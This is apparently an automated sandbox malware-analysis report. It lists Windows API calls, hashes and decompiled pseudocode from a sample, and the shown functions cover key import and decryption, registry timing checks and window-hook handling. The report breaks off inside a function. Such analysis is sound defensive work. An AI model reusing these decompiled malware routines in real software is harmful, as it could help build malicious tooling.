                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 025292AA
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252A237: CryptAcquireContextA.ADVAPI32(00000000,04013370,0400C7C8,00000001,00000000), ref: 0252A29A
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252A237: GetLastError.KERNEL32 ref: 0252A2A4
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252A237: CryptAcquireContextA.ADVAPI32(00000000,04013370,0400C7F8,00000001,00000008), ref: 0252A2D3
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252A237: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 0252A2FE
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252A237: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 0252A325
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252A237: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 0252A341
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252A237: CryptDestroyKey.ADVAPI32(00000000), ref: 0252A34E
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252A237: CryptDestroyKey.ADVAPI32(00000000), ref: 0252A358
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252A237: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0252A364
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02529212
                                                                                                                                                                                                                                                                                          • inet_ntoa.WS2_32(?), ref: 02529257
                                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 02529283
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$CloseDecryptErrorFreeLastOpenQueryReleaseValueinet_ntoawnsprintf
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1891311255-0
                                                                                                                                                                                                                                                                                          • Opcode ID: ff601da54595e3141c4ee6180892f57eaa55f106177f2431a5f5641ff32353a4
                                                                                                                                                                                                                                                                                          • Instruction ID: 5967af85e9b41f4c0c08fc863bc8915defd89c3ff4dd7e7c2af8b5ad2202a511
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff601da54595e3141c4ee6180892f57eaa55f106177f2431a5f5641ff32353a4
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42410E71E00209ABEB08DF94C985BEDBBB5FB48705F148159E6057B3C0D7759A44CFA8
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 02528A84
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,000F003F,00000000), ref: 02528AC0
                                                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,00000010), ref: 02528AF0
                                                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 02528B0A
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 02528B70
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CloseLocalOpenQueryTimeValuewsprintf
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3852505512-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 9fc5ed1871f13b41f857c89104141c1ca61f136d8528aa37c76ad80783d1fa8b
                                                                                                                                                                                                                                                                                          • Instruction ID: 70254c0ed7484e63a82359f9d7ebff820f715a3cb3c5fb5b5ec439e6cd2cf60a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fc5ed1871f13b41f857c89104141c1ca61f136d8528aa37c76ad80783d1fa8b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE414BB59002089FEB08CF94C448BEDBBB5FF49300F14865DE905AB291D7759A48CFA5
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                                                                                                          			E04007250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                                          				char* _v12;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                                                                                                                          				int _v44;
                                                                                                                                                                                                                                                                                          				int _v48;
                                                                                                                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                                                                                                                          				signed int _v68;
                                                                                                                                                                                                                                                                                          				intOrPtr* _v72;
                                                                                                                                                                                                                                                                                          				struct _SYSTEMTIME _v88;
                                                                                                                                                                                                                                                                                          				char* _t58;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t68;
                                                                                                                                                                                                                                                                                          				short* _t69;
                                                                                                                                                                                                                                                                                          				signed int _t70;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t91;
                                                                                                                                                                                                                                                                                          				void* _t97;
                                                                                                                                                                                                                                                                                          				void* _t100;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t101;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v5 = 1;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 ||  *((intOrPtr*)(_a4 + 0x10)) == 0) {
                                                                                                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                                                                                                          					return _v5;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v24 = E040016F0(_a8, _a12);
                                                                                                                                                                                                                                                                                          					_t58 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                                          					_v12 = _t58;
                                                                                                                                                                                                                                                                                          					E04007D20(_t58,  &_v40, 0, 0x10);
                                                                                                                                                                                                                                                                                          					wsprintfA( &_v40, "%u", _v24);
                                                                                                                                                                                                                                                                                          					_t100 = _t97 + 0x20;
                                                                                                                                                                                                                                                                                          					_v16 = 0x80000001;
                                                                                                                                                                                                                                                                                          					if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          						_v16 = 0x80000002;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v20 = 0;
                                                                                                                                                                                                                                                                                          					if(RegOpenKeyExA(_v16, _v12, 0, 0xf003f,  &_v20) == 0) {
                                                                                                                                                                                                                                                                                          						_v48 = 0x10;
                                                                                                                                                                                                                                                                                          						_v44 = 0x10;
                                                                                                                                                                                                                                                                                          						if(RegQueryValueExA(_v20,  &_v40, 0, 0,  &_v64,  &_v44) == 0 && _v44 == 0x10) {
                                                                                                                                                                                                                                                                                          							_v72 =  &_v64;
                                                                                                                                                                                                                                                                                          							GetLocalTime( &_v88);
                                                                                                                                                                                                                                                                                          							_t91 = _v72;
                                                                                                                                                                                                                                                                                          							_t101 = _t100 - 0x10;
                                                                                                                                                                                                                                                                                          							_t68 = _t101;
                                                                                                                                                                                                                                                                                          							 *_t68 =  *_t91;
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t68 + 4)) =  *((intOrPtr*)(_t91 + 4));
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t68 + 8)) =  *((intOrPtr*)(_t91 + 8));
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t68 + 0xc)) =  *((intOrPtr*)(_t91 + 0xc));
                                                                                                                                                                                                                                                                                          							_t69 = _t101 - 0x10;
                                                                                                                                                                                                                                                                                          							 *_t69 = _v88.wYear;
                                                                                                                                                                                                                                                                                          							_t69[2] = _v88.wDayOfWeek;
                                                                                                                                                                                                                                                                                          							_t69[4] = _v88.wHour;
                                                                                                                                                                                                                                                                                          							_t69[6] = _v88.wSecond;
                                                                                                                                                                                                                                                                                          							_t70 = E04009910();
                                                                                                                                                                                                                                                                                          							asm("cdq");
                                                                                                                                                                                                                                                                                          							_v68 = _t70 / 0x3c;
                                                                                                                                                                                                                                                                                          							if(_v68 <  *((intOrPtr*)(_a4 + 0x10))) {
                                                                                                                                                                                                                                                                                          								_v5 = 0;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						RegCloseKey(_v20);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}























                                                                                                                                                                                                                                                                                          0x04007256
                                                                                                                                                                                                                                                                                          0x0400725e
                                                                                                                                                                                                                                                                                          0x040073af
                                                                                                                                                                                                                                                                                          0x040073b5
                                                                                                                                                                                                                                                                                          0x04007285
                                                                                                                                                                                                                                                                                          0x04007295
                                                                                                                                                                                                                                                                                          0x04007298
                                                                                                                                                                                                                                                                                          0x0400729d
                                                                                                                                                                                                                                                                                          0x040072a8
                                                                                                                                                                                                                                                                                          0x040072bd
                                                                                                                                                                                                                                                                                          0x040072c3
                                                                                                                                                                                                                                                                                          0x040072c6
                                                                                                                                                                                                                                                                                          0x040072d6
                                                                                                                                                                                                                                                                                          0x040072d8
                                                                                                                                                                                                                                                                                          0x040072d8
                                                                                                                                                                                                                                                                                          0x040072df
                                                                                                                                                                                                                                                                                          0x04007301
                                                                                                                                                                                                                                                                                          0x04007307
                                                                                                                                                                                                                                                                                          0x0400730e
                                                                                                                                                                                                                                                                                          0x04007331
                                                                                                                                                                                                                                                                                          0x0400733c
                                                                                                                                                                                                                                                                                          0x04007343
                                                                                                                                                                                                                                                                                          0x04007349
                                                                                                                                                                                                                                                                                          0x0400734c
                                                                                                                                                                                                                                                                                          0x0400734f
                                                                                                                                                                                                                                                                                          0x04007353
                                                                                                                                                                                                                                                                                          0x04007358
                                                                                                                                                                                                                                                                                          0x0400735e
                                                                                                                                                                                                                                                                                          0x04007364
                                                                                                                                                                                                                                                                                          0x0400736a
                                                                                                                                                                                                                                                                                          0x0400736f
                                                                                                                                                                                                                                                                                          0x04007374
                                                                                                                                                                                                                                                                                          0x0400737a
                                                                                                                                                                                                                                                                                          0x04007380
                                                                                                                                                                                                                                                                                          0x04007383
                                                                                                                                                                                                                                                                                          0x0400738b
                                                                                                                                                                                                                                                                                          0x04007393
                                                                                                                                                                                                                                                                                          0x0400739f
                                                                                                                                                                                                                                                                                          0x040073a1
                                                                                                                                                                                                                                                                                          0x040073a1
                                                                                                                                                                                                                                                                                          0x0400739f
                                                                                                                                                                                                                                                                                          0x040073a9
                                                                                                                                                                                                                                                                                          0x040073a9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04007301

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 040072BD
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,000F003F,00000000), ref: 040072F9
                                                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,00000010), ref: 04007329
                                                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 04007343
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 040073A9
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CloseLocalOpenQueryTimeValuewsprintf
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3852505512-0
                                                                                                                                                                                                                                                                                          • Opcode ID: dbb66ec4e40f0b96ddf8d886ab6d66ea576557e999e4472c56c1706dad51e441
                                                                                                                                                                                                                                                                                          • Instruction ID: 1589668eb117d9c12aae7036857c9bc1fd79cd220dc98d09134ced9bc9b72130
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbb66ec4e40f0b96ddf8d886ab6d66ea576557e999e4472c56c1706dad51e441
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE414C74900208EFEB08DF94D885BEDBBB5FF48300F14C569E915AB281D779AA45CF91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                                                                                                                          			E000FDEC0(int __edx, char _a4, long _a8) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION* _v24;
                                                                                                                                                                                                                                                                                          				void* __ecx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t22;
                                                                                                                                                                                                                                                                                          				long _t27;
                                                                                                                                                                                                                                                                                          				void* _t32;
                                                                                                                                                                                                                                                                                          				void* _t37;
                                                                                                                                                                                                                                                                                          				int _t38;
                                                                                                                                                                                                                                                                                          				intOrPtr _t43;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t46;
                                                                                                                                                                                                                                                                                          				void* _t47;
                                                                                                                                                                                                                                                                                          				struct HHOOK__** _t49;
                                                                                                                                                                                                                                                                                          				char _t51;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t53;
                                                                                                                                                                                                                                                                                          				signed int _t54;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010F618);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_push(_t47);
                                                                                                                                                                                                                                                                                          				_t22 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_push(_t22 ^ _t54);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t51 = _a4;
                                                                                                                                                                                                                                                                                          				_t27 = CallWindowProcA( *(_t51 + 0x40),  *(_t51 + 4), __edx, _t38, _a8);
                                                                                                                                                                                                                                                                                          				_a8 = _t27;
                                                                                                                                                                                                                                                                                          				if(( *(_t51 + 0x84) & 0x00000002) != 0) {
                                                                                                                                                                                                                                                                                          					L16:
                                                                                                                                                                                                                                                                                          					 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          					return _t27;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v24 = 0x170c68;
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				EnterCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          				_v20 = 1;
                                                                                                                                                                                                                                                                                          				if( *0x171994 == 0) {
                                                                                                                                                                                                                                                                                          					L15:
                                                                                                                                                                                                                                                                                          					LeaveCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          					_t27 = _a8;
                                                                                                                                                                                                                                                                                          					goto L16;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t37 = GetCurrentThreadId();
                                                                                                                                                                                                                                                                                          				_a4 = _t37;
                                                                                                                                                                                                                                                                                          				_t49 = E00101B70( &_a4, _t47, _t51);
                                                                                                                                                                                                                                                                                          				if(_t49 == 0) {
                                                                                                                                                                                                                                                                                          					goto L15;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t15 =  &(_t49[1]);
                                                                                                                                                                                                                                                                                          				 *_t15 = _t49[1] - 1;
                                                                                                                                                                                                                                                                                          				if( *_t15 != 0) {
                                                                                                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                                                                                                          					_t53 =  *0x171994; // 0x0
                                                                                                                                                                                                                                                                                          					L13:
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t53 + 8)) == 0) {
                                                                                                                                                                                                                                                                                          						E000FFF20(_t53);
                                                                                                                                                                                                                                                                                          						 *0x171994 = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L15;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				UnhookWindowsHookEx( *_t49);
                                                                                                                                                                                                                                                                                          				_t53 =  *0x171994; // 0x0
                                                                                                                                                                                                                                                                                          				_t43 =  *((intOrPtr*)(_t53 + 8));
                                                                                                                                                                                                                                                                                          				_t32 = 0;
                                                                                                                                                                                                                                                                                          				if(_t43 <= 0) {
                                                                                                                                                                                                                                                                                          					goto L13;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t46 =  *_t53;
                                                                                                                                                                                                                                                                                          					while( *_t46 != _t37) {
                                                                                                                                                                                                                                                                                          						_t32 = _t32 + 1;
                                                                                                                                                                                                                                                                                          						_t46 = _t46 + 4;
                                                                                                                                                                                                                                                                                          						if(_t32 < _t43) {
                                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L13;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_t32 == 0xffffffff) {
                                                                                                                                                                                                                                                                                          						goto L13;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(E00102BE0(_t32, _t53) != 0) {
                                                                                                                                                                                                                                                                                          						_push(_t49);
                                                                                                                                                                                                                                                                                          						E001059DB();
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}






















                                                                                                                                                                                                                                                                                          0x000fdec3
                                                                                                                                                                                                                                                                                          0x000fdec5
                                                                                                                                                                                                                                                                                          0x000fded0
                                                                                                                                                                                                                                                                                          0x000fded6
                                                                                                                                                                                                                                                                                          0x000fded7
                                                                                                                                                                                                                                                                                          0x000fdede
                                                                                                                                                                                                                                                                                          0x000fdee2
                                                                                                                                                                                                                                                                                          0x000fdee8
                                                                                                                                                                                                                                                                                          0x000fdef9
                                                                                                                                                                                                                                                                                          0x000fdf06
                                                                                                                                                                                                                                                                                          0x000fdf09
                                                                                                                                                                                                                                                                                          0x000fdfbe
                                                                                                                                                                                                                                                                                          0x000fdfc1
                                                                                                                                                                                                                                                                                          0x000fdfcf
                                                                                                                                                                                                                                                                                          0x000fdfcf
                                                                                                                                                                                                                                                                                          0x000fdf0f
                                                                                                                                                                                                                                                                                          0x000fdf1b
                                                                                                                                                                                                                                                                                          0x000fdf22
                                                                                                                                                                                                                                                                                          0x000fdf2f
                                                                                                                                                                                                                                                                                          0x000fdf33
                                                                                                                                                                                                                                                                                          0x000fdfb0
                                                                                                                                                                                                                                                                                          0x000fdfb5
                                                                                                                                                                                                                                                                                          0x000fdfbb
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fdfbb
                                                                                                                                                                                                                                                                                          0x000fdf3b
                                                                                                                                                                                                                                                                                          0x000fdf40
                                                                                                                                                                                                                                                                                          0x000fdf48
                                                                                                                                                                                                                                                                                          0x000fdf4c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fdf4e
                                                                                                                                                                                                                                                                                          0x000fdf4e
                                                                                                                                                                                                                                                                                          0x000fdf51
                                                                                                                                                                                                                                                                                          0x000fdf95
                                                                                                                                                                                                                                                                                          0x000fdf95
                                                                                                                                                                                                                                                                                          0x000fdf9b
                                                                                                                                                                                                                                                                                          0x000fdf9f
                                                                                                                                                                                                                                                                                          0x000fdfa1
                                                                                                                                                                                                                                                                                          0x000fdfa6
                                                                                                                                                                                                                                                                                          0x000fdfa6
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fdf9f
                                                                                                                                                                                                                                                                                          0x000fdf56
                                                                                                                                                                                                                                                                                          0x000fdf5c
                                                                                                                                                                                                                                                                                          0x000fdf62
                                                                                                                                                                                                                                                                                          0x000fdf65
                                                                                                                                                                                                                                                                                          0x000fdf69
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fdf6b
                                                                                                                                                                                                                                                                                          0x000fdf6b
                                                                                                                                                                                                                                                                                          0x000fdf70
                                                                                                                                                                                                                                                                                          0x000fdf74
                                                                                                                                                                                                                                                                                          0x000fdf75
                                                                                                                                                                                                                                                                                          0x000fdf7a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fdf7c
                                                                                                                                                                                                                                                                                          0x000fdf81
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fdf8a
                                                                                                                                                                                                                                                                                          0x000fdf8c
                                                                                                                                                                                                                                                                                          0x000fdf8d
                                                                                                                                                                                                                                                                                          0x000fdf92
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fdf8a

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CallWindowProcA.USER32 ref: 000FDEF9
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00170C68), ref: 000FDF22
                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 000FDF35
                                                                                                                                                                                                                                                                                          • UnhookWindowsHookEx.USER32 ref: 000FDF56
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00170C68), ref: 000FDFB5
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$CallCurrentEnterHookLeaveProcThreadUnhookWindowWindows
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1449620483-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 594b0a22429f5f5db944e13e23ba347a39a25e8124fafcc08bbf4edd7c2f8a20
                                                                                                                                                                                                                                                                                          • Instruction ID: fedba66700272e4fb38bb190707570c6ceb4538e02a65645312962e13b08b1c7
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 594b0a22429f5f5db944e13e23ba347a39a25e8124fafcc08bbf4edd7c2f8a20
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3331F571500209EFC711CF54DD84BBAB7F5FB88314F10852AF91A97A80D774A888DB51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 74%
                                                                                                                                                                                                                                                                                          			E000FFF90(struct HMENU__* __eax, signed short __ebx, int __ecx, int* _a4, CHAR* _a8, signed int _a12, long _a16, struct HMENU__* _a20) {
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                                                                                          				char _v215;
                                                                                                                                                                                                                                                                                          				char _v216;
                                                                                                                                                                                                                                                                                          				int _v220;
                                                                                                                                                                                                                                                                                          				int _v224;
                                                                                                                                                                                                                                                                                          				signed int _v228;
                                                                                                                                                                                                                                                                                          				int _v232;
                                                                                                                                                                                                                                                                                          				void* _v236;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v240;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v244;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v248;
                                                                                                                                                                                                                                                                                          				void* _v252;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v268;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _v272;
                                                                                                                                                                                                                                                                                          				int _v276;
                                                                                                                                                                                                                                                                                          				struct HMENU__** _v280;
                                                                                                                                                                                                                                                                                          				intOrPtr _v284;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _v288;
                                                                                                                                                                                                                                                                                          				int _v292;
                                                                                                                                                                                                                                                                                          				CHAR* _v296;
                                                                                                                                                                                                                                                                                          				int _v300;
                                                                                                                                                                                                                                                                                          				int _v304;
                                                                                                                                                                                                                                                                                          				int _v308;
                                                                                                                                                                                                                                                                                          				int _v312;
                                                                                                                                                                                                                                                                                          				int _v316;
                                                                                                                                                                                                                                                                                          				void* _v320;
                                                                                                                                                                                                                                                                                          				struct tagMENUITEMINFOA _v368;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v428;
                                                                                                                                                                                                                                                                                          				char _v456;
                                                                                                                                                                                                                                                                                          				char _v460;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t110;
                                                                                                                                                                                                                                                                                          				struct HWND__** _t114;
                                                                                                                                                                                                                                                                                          				long _t117;
                                                                                                                                                                                                                                                                                          				long _t120;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t121;
                                                                                                                                                                                                                                                                                          				signed char _t134;
                                                                                                                                                                                                                                                                                          				int _t141;
                                                                                                                                                                                                                                                                                          				intOrPtr _t157;
                                                                                                                                                                                                                                                                                          				int* _t158;
                                                                                                                                                                                                                                                                                          				signed short _t164;
                                                                                                                                                                                                                                                                                          				void* _t166;
                                                                                                                                                                                                                                                                                          				void* _t167;
                                                                                                                                                                                                                                                                                          				signed char _t171;
                                                                                                                                                                                                                                                                                          				int _t172;
                                                                                                                                                                                                                                                                                          				long _t173;
                                                                                                                                                                                                                                                                                          				void* _t182;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t206;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t207;
                                                                                                                                                                                                                                                                                          				void* _t208;
                                                                                                                                                                                                                                                                                          				void* _t209;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t214;
                                                                                                                                                                                                                                                                                          				int _t215;
                                                                                                                                                                                                                                                                                          				void* _t216;
                                                                                                                                                                                                                                                                                          				int _t217;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t218;
                                                                                                                                                                                                                                                                                          				void* _t219;
                                                                                                                                                                                                                                                                                          				CHAR* _t220;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t221;
                                                                                                                                                                                                                                                                                          				signed int _t227;
                                                                                                                                                                                                                                                                                          				signed int _t228;
                                                                                                                                                                                                                                                                                          				void* _t230;
